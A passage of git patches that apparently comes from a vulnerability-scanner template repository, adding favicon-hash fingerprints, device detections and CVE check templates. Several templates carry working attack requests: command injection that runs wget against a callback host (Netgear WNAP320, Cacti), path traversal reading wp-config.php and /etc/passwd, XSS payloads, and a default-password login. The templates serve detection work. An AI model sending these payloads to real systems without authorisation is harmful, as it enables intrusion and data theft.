"otrs-open-ticket-request-system" dsl: - "status_code==200 && (\"-2006308185\" == mmh3(base64_py(body)))" + - type: dsl name: "bosch-security-systems-camera" dsl: - "status_code==200 && (\"-1702769256\" == mmh3(base64_py(body)))" + - type: dsl name: "node-red" dsl: - "status_code==200 && (\"321591353\" == mmh3(base64_py(body)))" + - type: dsl name: "motioneye-camera" dsl: - "status_code==200 && (\"-923693877\" == mmh3(base64_py(body)))" + - type: dsl name: "saia-burgess-controls-pcd" dsl: - "status_code==200 && (\"-1547576879\" == mmh3(base64_py(body)))" + - type: dsl name: "arcadyan-o2-box-network" dsl: - "status_code==200 && (\"1479202414\" == mmh3(base64_py(body)))" + - type: dsl name: "d-link-network" dsl: - "status_code==200 && (\"1081719753\" == mmh3(base64_py(body)))" + - type: dsl name: "abilis-network/automation" dsl: - "status_code==200 && (\"-166151761\" == mmh3(base64_py(body)))" + - type: dsl name: "ghost-cms" dsl: - "status_code==200 && (\"-1231681737\" == mmh3(base64_py(body)))" + - type: dsl name: "airwatch" dsl: - "status_code==200 && (\"321909464\" == mmh3(base64_py(body)))" + - type: dsl name: "airwatch" dsl: - "status_code==200 && (\"-1153873472\" == mmh3(base64_py(body)))" + - type: dsl name: "airwatch" dsl: - "status_code==200 && (\"1095915848\" == mmh3(base64_py(body)))" + - type: dsl name: "airwatch" dsl: - "status_code==200 && (\"788771792\" == mmh3(base64_py(body)))" + - type: dsl name: "airwatch" dsl: - "status_code==200 && (\"-1863663974\" == mmh3(base64_py(body)))" + - type: dsl name: "keyhelp-keyweb-ag" dsl: - "status_code==200 && (\"-1267819858\" == mmh3(base64_py(body)))" + - type: dsl name: "keyhelp-keyweb-ag" dsl: - "status_code==200 && (\"726817668\" == mmh3(base64_py(body)))" + - type: dsl name: "glpi" dsl: - "status_code==200 && (\"-1474875778\" == mmh3(base64_py(body)))" + - type: dsl name: "netcom-technology" dsl: - "status_code==200 && (\"5471989\" == mmh3(base64_py(body)))" + - type: dsl name: "cradlepoint" dsl: - "status_code==200 && (\"-1457536113\" == mmh3(base64_py(body)))" + - type: dsl name: "myasp" dsl: - "status_code==200 && (\"-736276076\" == mmh3(base64_py(body)))" + - type: dsl name: "intelbras-sa" dsl: - "status_code==200 && (\"-1343070146\" == mmh3(base64_py(body)))" + - type: dsl name: "lenel" dsl: - "status_code==200 && (\"538585915\" == mmh3(base64_py(body)))" + - type: dsl name: "okofen-pellematic" dsl: - "status_code==200 && (\"-625364318\" == mmh3(base64_py(body)))" + - type: dsl name: "simplehelp-remote-support" dsl: - "status_code==200 && (\"1117165781\" == mmh3(base64_py(body)))" + - type: dsl name: "graphql" dsl: - "status_code==200 && (\"-1067420240\" == mmh3(base64_py(body)))" + - type: dsl name: "dnn-cms" dsl: - "status_code==200 && (\"-1465479343\" == mmh3(base64_py(body)))" + - type: dsl name: "apple" dsl: - "status_code==200 && (\"1232159009\" == mmh3(base64_py(body)))" + - type: dsl name: "apple" dsl: - "status_code==200 && (\"1382324298\" == mmh3(base64_py(body)))" + - type: dsl name: "apple" dsl: - "status_code==200 && (\"-1498185948\" == mmh3(base64_py(body)))" + - type: dsl name: "ispconfig" dsl: - "status_code==200 && (\"483383992\" == mmh3(base64_py(body)))" + - type: dsl name: "microsoft-outlook" dsl: - "status_code==200 && (\"-1249852061\" == mmh3(base64_py(body)))" + - type: dsl name: "possibly-dvr" dsl: - "status_code==200 && (\"999357577\" == mmh3(base64_py(body)))" + - type: dsl name: "possible-ip-camera" dsl: - "status_code==200 && (\"492290497\" == mmh3(base64_py(body)))" + - type: dsl name: "dvr" dsl: - "status_code==200 && (\"400100893\" == mmh3(base64_py(body)))" + - type: dsl name: "One Identity Password Manager" dsl: - "status_code==200 && (\"983384876\" == mmh3(base64_py(body)))" + - type: dsl name: "Kaseya" dsl: - "status_code==200 && (\"-1445519482\" == mmh3(base64_py(body)))" + - type: dsl name: "OpenSNS" dsl: - "status_code==200 && (\"1167011145\" == mmh3(base64_py(body)))" + - type: dsl name: "SpamSniper" dsl: - "status_code==200 && (\"-1000719429\" == mmh3(base64_py(body)))" + - type: dsl name: "Selea-ANPR-Camera" dsl: - "status_code==200 && (\"-41369781\" == mmh3(base64_py(body)))" + - type: dsl name: "Selea-CarPlateServer" dsl: - "status_code==200 && (\"-656528622\" == mmh3(base64_py(body)))" + + - type: dsl name: "KevinLAB" dsl: - "status_code==200 && (\"-1650202746\" == mmh3(base64_py(body)))" \ No newline at end of file From 52e2888c007e9b22fc1a65889790cdeebfc82946 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sun, 25 Jul 2021 23:21:31 +0000 Subject: [PATCH 1132/4083] Create detect-addpac-voip-gateway.yaml --- network/detect-addpac-voip-gateway.yaml | 29 +++++++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 network/detect-addpac-voip-gateway.yaml diff --git a/network/detect-addpac-voip-gateway.yaml b/network/detect-addpac-voip-gateway.yaml new file mode 100644 index 0000000000..2328362cda --- /dev/null +++ b/network/detect-addpac-voip-gateway.yaml @@ -0,0 +1,29 @@ +id: detect-addpac-voip-gateway + +info: + name: Detect AddPac Technology GSM VoIP Gateway + reference: http://www.addpac.com/addpac_eng2/down.php?file=505_f16.pdf + author: geeknik + severity: info + tags: network,addpac,apos + +network: + - inputs: + - data: '00' + type: hex + + host: + - "{{Hostname}}:23" + + matchers: + - type: word + words: + - "Welcome" + - "APOS(tm)" + - "User Access Verification" + condition: and + + extractors: + - type: regex + regex: + - 'Kernel Version \d\.\d\d\.\d\d\d' From c72190c4bfcbcacb8093f98e7fb479f05f030053 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 26 Jul 2021 08:35:22 +0900 Subject: [PATCH 1133/4083] Create netgear-wnap320-rce.yaml vulnerabilities in the web-based management interface of Netgear WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device. Signed-off-by: GwanYeong Kim --- .../other/netgear-wnap320-rce.yaml | 29 +++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 vulnerabilities/other/netgear-wnap320-rce.yaml diff --git a/vulnerabilities/other/netgear-wnap320-rce.yaml b/vulnerabilities/other/netgear-wnap320-rce.yaml new file mode 100644 index 0000000000..4d205b32a7 --- /dev/null +++ b/vulnerabilities/other/netgear-wnap320-rce.yaml @@ -0,0 +1,29 @@ +id: netgear-wnap320-rce + +info: + name: Netgear WNAP320 Access Point - Remote Code Execution (Unauthenticated) + author: gy741 + severity: critical + description: vulnerabilities in the web-based management interface of Netgear WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device. + reference: | + - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE + tags: netgear,rce,oob + +requests: + - raw: + - | + POST /boardDataWW.php HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.18.4 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + Content-Type: application/x-www-form-urlencoded + + macAddress=112233445566%3Bwget+http%3A%2F%2F{{interactsh-url}}%23®info=0&writeData=Submit + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 432e3ecc85e7cc02e496c9b2edc289b7ff85f54d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 26 Jul 2021 06:49:51 +0700 Subject: [PATCH 1134/4083] Create CVE-2013-7240.yaml --- cves/2013/CVE-2013-7240.yaml | 28 ++++++++++++++++++++++++++++ 1 file changed, 28 insertions(+) create mode 100644 cves/2013/CVE-2013-7240.yaml diff --git a/cves/2013/CVE-2013-7240.yaml b/cves/2013/CVE-2013-7240.yaml new file mode 100644 index 0000000000..4b753403e7 --- /dev/null +++ b/cves/2013/CVE-2013-7240.yaml @@ -0,0 +1,28 @@ +id: CVE-2013-7240 + +info: + name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal + author: daffainfo + severity: high + tags: cve,cve2013,wordpress,wp-plugin,lfi + description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. + reference: | + - https://www.exploit-db.com/exploits/38936 + - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php ' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 From a9d07605c3b90bf816a4fd04241b016fb124e25d Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 26 Jul 2021 06:55:17 +0700 Subject: [PATCH 1135/4083] Update CVE-2014-6308.yaml --- cves/2014/CVE-2014-6308.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2014/CVE-2014-6308.yaml b/cves/2014/CVE-2014-6308.yaml index fa7b6414d5..bc9fe62650 100644 --- a/cves/2014/CVE-2014-6308.yaml +++ b/cves/2014/CVE-2014-6308.yaml @@ -17,7 +17,7 @@ requests: - type: regex regex: - - "root:[x*]:0:0" + - "root:.*:0:0" - type: status status: From fed682443e910c128906a458858734784773e59c Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 26 Jul 2021 06:55:48 +0700 Subject: [PATCH 1136/4083] Update CVE-2020-35580.yaml --- cves/2020/CVE-2020-35580.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-35580.yaml b/cves/2020/CVE-2020-35580.yaml index 69ce8b4f8c..c5fa22a091 100644 --- a/cves/2020/CVE-2020-35580.yaml +++ b/cves/2020/CVE-2020-35580.yaml @@ -16,5 +16,5 @@ requests: matchers: - type: regex regex: - - "root:[x*]:0:0:" + - "root:.*:0:0" part: body From f8e16c595ab845004d83d8d14323f68b488d6687 Mon Sep 17 00:00:00 2001 From: Muhammad Daffa <36522826+daffainfo@users.noreply.github.com> Date: Mon, 26 Jul 2021 06:58:58 +0700 Subject: [PATCH 1137/4083] Create CVE-2014-2962.yaml --- cves/2014/CVE-2014-2962.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 cves/2014/CVE-2014-2962.yaml diff --git a/cves/2014/CVE-2014-2962.yaml b/cves/2014/CVE-2014-2962.yaml new file mode 100644 index 0000000000..a3060c1d66 --- /dev/null +++ b/cves/2014/CVE-2014-2962.yaml @@ -0,0 +1,25 @@ +id: CVE-2014-2962 + +info: + name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal + author: daffainfo + severity: high + description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. + reference: https://www.exploit-db.com/exploits/36256 + tags: cve,cve2014,lfi,router + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 620ff3f367e6968301b18b850798df0537052ee6 Mon Sep 17 00:00:00 2001 From: GwanYeong Kim Date: Mon, 26 Jul 2021 11:32:23 +0900 Subject: [PATCH 1138/4083] Create CVE-2020-8813.yaml MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability Signed-off-by: GwanYeong Kim --- cves/2020/CVE-2020-8813.yaml | 35 +++++++++++++++++++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 cves/2020/CVE-2020-8813.yaml diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml new file mode 100644 index 0000000000..825d7af47d --- /dev/null +++ b/cves/2020/CVE-2020-8813.yaml @@ -0,0 +1,35 @@ +id: CVE-2020-8813 + +info: + name: Cacti v1.2.8 - Unauthenticated Remote Code Execution + author: gy741 + severity: critical + description: This vulnerability could be exploited without authentication if Cacti is enabling “Guest Realtime Graphs” privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability + reference: | + - https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/ + tags: cve,cve2020,cacti,rce,oob + +requests: + - raw: + - | + GET /graph_realtime.php?action=init HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.18.4 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + + - | + GET /graph_realtime.php?action=init HTTP/1.1 + Host: {{Hostname}} + User-Agent: python-requests/2.18.4 + Accept-Encoding: gzip, deflate + Accept: */* + Connection: keep-alive + Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}} + + matchers: + - type: word + part: interactsh_protocol # Confirms the HTTP Interaction + words: + - "http" From 934d899f5e93197d8e09337db0e6cf60f88cc4d3 Mon Sep 17 00:00:00 2001 From: Pham Sy Minh <59408894+shelld3v@users.noreply.github.com> Date: Mon, 26 Jul 2021 12:53:34 +0700 Subject: [PATCH 1139/4083] Reduce false positives --- misconfiguration/shell-history.yaml | 9 ++++++--- 1 file changed, 6 insertions(+), 3 deletions(-) diff --git a/misconfiguration/shell-history.yaml b/misconfiguration/shell-history.yaml index fc007125d0..cec582f3c6 100644 --- a/misconfiguration/shell-history.yaml +++ b/misconfiguration/shell-history.yaml @@ -21,15 +21,16 @@ requests: matchers: - type: word words: + - "ls" + - "mkdir " - "chmod " - - "exit" - - "kill " + - "mv " - "nano " - "vim " - "pico " - "sudo " - - "rm " - "cd " + - "cp " - "ps aux " condition: or @@ -40,6 +41,8 @@ requests: - type: word words: - "application/javascript" + - "application/json" + - "application/xml" - "html>" - "text/html" part: all From 84161bc33e0623adda655852167d6956e5f8208b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 26 Jul 2021 13:27:19 +0530 Subject: [PATCH 1140/4083] Update CVE-2020-8813.yaml --- cves/2020/CVE-2020-8813.yaml | 8 -------- 1 file changed, 8 deletions(-) diff --git a/cves/2020/CVE-2020-8813.yaml b/cves/2020/CVE-2020-8813.yaml index 825d7af47d..586fc0dfb9 100644 --- a/cves/2020/CVE-2020-8813.yaml +++ b/cves/2020/CVE-2020-8813.yaml @@ -11,14 +11,6 @@ info: requests: - raw: - - | - GET /graph_realtime.php?action=init HTTP/1.1 - Host: {{Hostname}} - User-Agent: python-requests/2.18.4 - Accept-Encoding: gzip, deflate - Accept: */* - Connection: keep-alive - - | GET /graph_realtime.php?action=init HTTP/1.1 Host: {{Hostname}} From 154ed31be9a97af3b4bbec67447d9bb1b03ed9d0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 26 Jul 2021 13:30:16 +0530 Subject: [PATCH 1141/4083] Update CVE-2014-2962.yaml --- cves/2014/CVE-2014-2962.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2014/CVE-2014-2962.yaml b/cves/2014/CVE-2014-2962.yaml index a3060c1d66..c0b20521c0 100644 --- a/cves/2014/CVE-2014-2962.yaml +++ b/cves/2014/CVE-2014-2962.yaml @@ -5,7 +5,7 @@ info: author: daffainfo severity: high description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter. - reference: https://www.exploit-db.com/exploits/36256 + reference: https://www.exploit-db.com/exploits/38488 tags: cve,cve2014,lfi,router requests: From e8f9cc580e72e861d17ba9e0924f677c9c99e6e6 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 26 Jul 2021 13:32:53 +0530 Subject: [PATCH 1142/4083] Update CVE-2013-7240.yaml --- cves/2013/CVE-2013-7240.yaml | 7 +++++-- 1 file changed, 5 insertions(+), 2 deletions(-) diff --git a/cves/2013/CVE-2013-7240.yaml b/cves/2013/CVE-2013-7240.yaml index 4b753403e7..cfa129b918 100644 --- a/cves/2013/CVE-2013-7240.yaml +++ b/cves/2013/CVE-2013-7240.yaml @@ -4,15 +4,16 @@ info: name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal author: daffainfo severity: high - tags: cve,cve2013,wordpress,wp-plugin,lfi description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter. reference: | - https://www.exploit-db.com/exploits/38936 - https://nvd.nist.gov/vuln/detail/CVE-2013-7240 + tags: cve,cve2013,wordpress,wp-plugin,lfi + requests: - method: GET path: - - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php ' + - '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php' matchers-condition: and matchers: @@ -20,6 +21,8 @@ requests: words: - "DB_NAME" - "DB_PASSWORD" + - "DB_HOST" + - "The base configurations of the WordPress" part: body condition: and From 86989129d10a0e71fa0bfb5eb8dd13456bd0011e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 26 Jul 2021 13:38:38 +0530 Subject: [PATCH 1143/4083] Update netgear-wnap320-rce.yaml --- vulnerabilities/other/netgear-wnap320-rce.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/vulnerabilities/other/netgear-wnap320-rce.yaml b/vulnerabilities/other/netgear-wnap320-rce.yaml index 4d205b32a7..520ec9e858 100644 --- a/vulnerabilities/other/netgear-wnap320-rce.yaml +++ b/vulnerabilities/other/netgear-wnap320-rce.yaml @@ -7,7 +7,7 @@ info: description: vulnerabilities in the web-based management interface of Netgear WNAP320 Access Point could allow an authenticated, remote attacker to perform command injection attacks against an affected device. reference: | - https://github.com/nobodyatall648/Netgear-WNAP320-Firmware-Version-2.0.3-RCE - tags: netgear,rce,oob + tags: netgear,rce,oob,router requests: - raw: From f5ceb9958a376dbe00ba057dbdd6adef507d3048 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 26 Jul 2021 13:50:41 +0530 Subject: [PATCH 1144/4083] Update detect-addpac-voip-gateway.yaml --- network/detect-addpac-voip-gateway.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/network/detect-addpac-voip-gateway.yaml b/network/detect-addpac-voip-gateway.yaml index 2328362cda..ab6397c908 100644 --- a/network/detect-addpac-voip-gateway.yaml +++ b/network/detect-addpac-voip-gateway.yaml @@ -13,6 +13,7 @@ network: type: hex host: + - "{{Hostname}}" - "{{Hostname}}:23" matchers: From a76d36ead28c6be02a6bac965b1cd595a3f29036 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 26 Jul 2021 14:05:41 +0530 Subject: [PATCH 1145/4083] Update CVE-2016-1000126.yaml --- cves/2016/CVE-2016-1000126.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000126.yaml b/cves/2016/CVE-2016-1000126.yaml index 9d1325cd3d..0d3a928804 100644 --- a/cves/2016/CVE-2016-1000126.yaml +++ b/cves/2016/CVE-2016-1000126.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3Cscript%3Ealert%28123%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/admin-font-editor/css.php?size=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From 73ddb84266100e4de1382fb95f395b0e7028907b Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 26 Jul 2021 14:08:03 +0530 Subject: [PATCH 1146/4083] Update CVE-2016-1000137.yaml --- cves/2016/CVE-2016-1000137.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000137.yaml b/cves/2016/CVE-2016-1000137.yaml index bc2f9e7e7a..12a3ce8d62 100644 --- a/cves/2016/CVE-2016-1000137.yaml +++ b/cves/2016/CVE-2016-1000137.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/hero-maps-pro/views/dashboard/index.php?v=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From c15e827b84158d5d67f3c0c75f2f2dd77768b33b Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Mon, 26 Jul 2021 14:18:24 +0530 Subject: [PATCH 1147/4083] Update development-logs.yaml --- exposures/logs/development-logs.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/exposures/logs/development-logs.yaml b/exposures/logs/development-logs.yaml index 86e44d8654..80e3ce0908 100644 --- a/exposures/logs/development-logs.yaml +++ b/exposures/logs/development-logs.yaml @@ -4,6 +4,7 @@ info: name: Discover development log files author: geeknik severity: info + tags: logs,exposure requests: - method: GET @@ -19,19 +20,23 @@ requests: - "Connecting to database specified by database.yml" - "Started GET" condition: or + - type: word words: - "DEPRECATION WARNING" - "CREATE TABLE" condition: or + - type: word part: header words: - "text/html" negative: true + - type: status status: - 200 + extractors: - type: regex name: last_modified From d4a3f345fb6a2b05917322510d81943a61d2e2ec Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 14:23:27 +0530 Subject: [PATCH 1148/4083] tags update --- exposures/logs/development-logs.yaml | 2 +- exposures/logs/production-logs.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/exposures/logs/development-logs.yaml b/exposures/logs/development-logs.yaml index 80e3ce0908..a46ddc2ed5 100644 --- a/exposures/logs/development-logs.yaml +++ b/exposures/logs/development-logs.yaml @@ -4,7 +4,7 @@ info: name: Discover development log files author: geeknik severity: info - tags: logs,exposure + tags: logs,exposure,rails requests: - method: GET diff --git a/exposures/logs/production-logs.yaml b/exposures/logs/production-logs.yaml index b29f636b94..37ddf6c511 100644 --- a/exposures/logs/production-logs.yaml +++ b/exposures/logs/production-logs.yaml @@ -4,7 +4,7 @@ info: name: Discover production log files author: geeknik severity: info - tags: exposure,logs + tags: exposure,logs,rails requests: - method: GET From b99024390679cf700e41f85a44e55d38db67c159 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 14:25:43 +0530 Subject: [PATCH 1149/4083] uniform tags --- cves/2021/CVE-2021-28150.yaml | 2 +- exposures/configs/configuration-listing.yaml | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-28150.yaml b/cves/2021/CVE-2021-28150.yaml index 245924ef14..f1dade1c72 100644 --- a/cves/2021/CVE-2021-28150.yaml +++ b/cves/2021/CVE-2021-28150.yaml @@ -9,7 +9,7 @@ info: reference: | - https://ssd-disclosure.com/ssd-advisory-hongdian-h8922-multiple-vulnerabilities/ - https://nvd.nist.gov/vuln/detail/CVE-2021-28150 - tags: cve,cve2021,hongdian,exposures + tags: cve,cve2021,hongdian,exposure requests: - raw: diff --git a/exposures/configs/configuration-listing.yaml b/exposures/configs/configuration-listing.yaml index 77dafe751a..43487617fb 100644 --- a/exposures/configs/configuration-listing.yaml +++ b/exposures/configs/configuration-listing.yaml @@ -6,7 +6,7 @@ info: severity: medium description: directory listing of sensitive files reference: https://www.exploit-db.com/ghdb/7014 - tags: config,listing,exposures + tags: config,listing,exposure requests: - method: GET From 68327ddfa12bc87c031bf3c4f4692530c7f06d86 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 26 Jul 2021 14:28:04 +0530 Subject: [PATCH 1150/4083] Update CVE-2016-1000138.yaml --- cves/2016/CVE-2016-1000138.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2016/CVE-2016-1000138.yaml b/cves/2016/CVE-2016-1000138.yaml index 37ea234570..b92f330cd6 100644 --- a/cves/2016/CVE-2016-1000138.yaml +++ b/cves/2016/CVE-2016-1000138.yaml @@ -10,13 +10,13 @@ info: requests: - method: GET path: - - "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3E%3C%22" + - "{{BaseURL}}/wp-content/plugins/indexisto/assets/js/indexisto-inject.php?indexisto_index=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E" matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word From e9210d80bf45968ba328c011c7daa6f5ca35c1e3 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 15:14:33 +0530 Subject: [PATCH 1151/4083] strict negative matchers --- exposures/configs/exposed-gitignore.yaml | 21 +++++++++++++++------ 1 file changed, 15 insertions(+), 6 deletions(-) diff --git a/exposures/configs/exposed-gitignore.yaml b/exposures/configs/exposed-gitignore.yaml index 38e3dfb918..a4fa28537d 100644 --- a/exposures/configs/exposed-gitignore.yaml +++ b/exposures/configs/exposed-gitignore.yaml @@ -20,11 +20,20 @@ requests: matchers: - type: dsl dsl: - - '!contains(tolower(body), " 50' - 'status_code == 200' - condition: and \ No newline at end of file + condition: and + + - type: word + words: + - "application/javascript" + - "application/json" + - "application/xml" + - "html" + - " Date: Mon, 26 Jul 2021 15:18:10 +0530 Subject: [PATCH 1152/4083] matcher update --- misconfiguration/iis-internal-ip-disclosure.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/misconfiguration/iis-internal-ip-disclosure.yaml b/misconfiguration/iis-internal-ip-disclosure.yaml index 60744893ae..ea0a55b062 100644 --- a/misconfiguration/iis-internal-ip-disclosure.yaml +++ b/misconfiguration/iis-internal-ip-disclosure.yaml @@ -19,6 +19,7 @@ requests: matchers-condition: and matchers: - type: regex + part: header regex: - '([0-9]{1,3}[\.]){3}[0-9]{1,3}' From b78eceb857329de54ec81265ae02c97a97fd8716 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 15:44:42 +0530 Subject: [PATCH 1153/4083] Added additional fckeditor path --- exposed-panels/webeditors.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/exposed-panels/webeditors.yaml b/exposed-panels/webeditors.yaml index 52f1068c2c..042d7f0949 100644 --- a/exposed-panels/webeditors.yaml +++ b/exposed-panels/webeditors.yaml @@ -2,7 +2,7 @@ id: webeditors info: name: Web Editors - author: princechaddha + author: princechaddha,bernardofsr severity: info tags: panel @@ -10,6 +10,7 @@ requests: - method: GET path: - "{{BaseURL}}/fckeditor/_samples/default.html" + - "{{BaseURL}}/fckeditor/editor/filemanager/connectors/uploadtest.html" - "{{BaseURL}}/ckeditor/samples/" - "{{BaseURL}}/editor/ckeditor/samples/" - "{{BaseURL}}/ckeditor/samples/sample_posteddata.php" @@ -17,12 +18,14 @@ requests: - "{{BaseURL}}/fck/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellchecker.php" - "{{BaseURL}}/fckeditor/editor/dialog/fck_spellerpages/spellerpages/server-scripts/spellcheckder.php" - "{{BaseURL}}/ueditor/php/getRemoteImage.php" + matchers: - type: word words: - "FCKeditor" - "<title>CKEditor Samples" - "http://ckeditor.com" + - "Custom Uploader URL:" - "init_spell()" - "'tip':'" condition: or From 54e72e7a3bd8c1fa95f19a46e0b52888b01f7470 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 16:17:38 +0530 Subject: [PATCH 1154/4083] Added exacqvision-default-credentials --- .../exacqvision-default-credentials.yaml | 36 +++++++++++++++++++ 1 file changed, 36 insertions(+) create mode 100644 default-logins/exacqvision/exacqvision-default-credentials.yaml diff --git a/default-logins/exacqvision/exacqvision-default-credentials.yaml b/default-logins/exacqvision/exacqvision-default-credentials.yaml new file mode 100644 index 0000000000..50e5cf8e5d --- /dev/null +++ b/default-logins/exacqvision/exacqvision-default-credentials.yaml @@ -0,0 +1,36 @@ +id: exacqvision-default-credentials + +info: + name: ExacqVision Default Password + author: ELSFA7110 + severity: high + tags: exacqvision,default-login + reference: https://cdn.exacq.com/auto/manspec/files_2/exacqvision_user_manuals/web_service/exacqVision_Web_Service_Configuration_User_Manual_(version%208.8).pdf + +requests: + - raw: + - | + POST /service.web HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Connection: close + + action=login&u=admin&p=admin256 + + matchers-condition: and + matchers: + - type: status + status: + - 200 + + - type: word + part: header + words: + - "application/json" + + - type: word + part: body + condition: and + words: + - '"auth":' + - '"success": true' From 4a1f85ac7646bac9260b72859b38c797d5a33945 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 26 Jul 2021 16:42:17 +0530 Subject: [PATCH 1155/4083] misc changes --- ...efault-Creds.yaml => ibm-storage-default-credential.yaml} | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) rename default-logins/ibm/{IBM-Default-Creds.yaml => ibm-storage-default-credential.yaml} (91%) diff --git a/default-logins/ibm/IBM-Default-Creds.yaml b/default-logins/ibm/ibm-storage-default-credential.yaml similarity index 91% rename from default-logins/ibm/IBM-Default-Creds.yaml rename to 